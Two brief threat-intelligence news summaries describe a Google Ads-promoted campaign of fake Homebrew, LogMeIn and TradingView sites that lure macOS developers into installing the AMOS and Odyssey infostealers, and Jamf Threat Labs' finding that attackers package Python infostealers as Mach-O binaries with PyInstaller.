A malicious campaign is targeting macOS developers through fake Homebrew, LogMeIn, and TradingView platforms that distribute infostealing malware such as AMOS and Odyssey. The campaign uses deceptive tactics to trick users into executing harmful commands in Terminal, leading to the theft of sensitive information from their systems. Researchers identified over 85 domains involved in this scheme, which are promoted via Google Ads to appear in search results.

Jamf Threat Labs has identified a new technique where attackers use PyInstaller to bundle Python-based infostealers into Mach-O executables on macOS. This method allows malware to run without requiring a native Python installation, while employing various obfuscation tactics to evade detection. The analysis includes dynamic and static examination of these malicious binaries, revealing behaviors consistent with infostealer activity.